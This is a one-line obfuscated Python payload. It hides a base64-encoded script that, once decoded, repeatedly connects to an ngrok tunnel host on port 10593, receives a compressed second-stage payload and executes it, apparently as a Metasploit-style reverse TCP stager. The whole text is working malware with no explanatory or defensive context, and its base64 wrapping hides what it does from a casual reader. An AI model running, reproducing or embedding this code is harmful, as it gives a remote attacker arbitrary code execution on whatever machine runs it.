exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')("""CmltcG9ydCBzb2NrZXQsemxpYixiYXNlNjQsc3RydWN0LHRpbWUsc3lzCmZvciB4IGluIHJhbmdl
KDEwKToKICAgICAgICB0cnk6CiAgICAgICAgICAgICAgICBzPXNvY2tldC5zb2NrZXQoMixzb2Nr
ZXQuU09DS19TVFJFQU0pCiAgICAgICAgICAgICAgICBzLmNvbm5lY3QoKCc0LnRjcC5uZ3Jvay5p
bycsIDEwNTkzKSkKICAgICAgICAgICAgICAgIGJyZWFrCiAgICAgICAgZXhjZXB0OgogICAgICAg
ICAgICAgICAgdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBd
CmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgogICAgICAgIGQrPXMucmVjdihsLWxlbihkKSkK
ZXhlYyh6bGliLmRlY29tcHJlc3MoYmFzZTY0LmI2NGRlY29kZShkKSkseydzJzpzfSk=""")[0]))
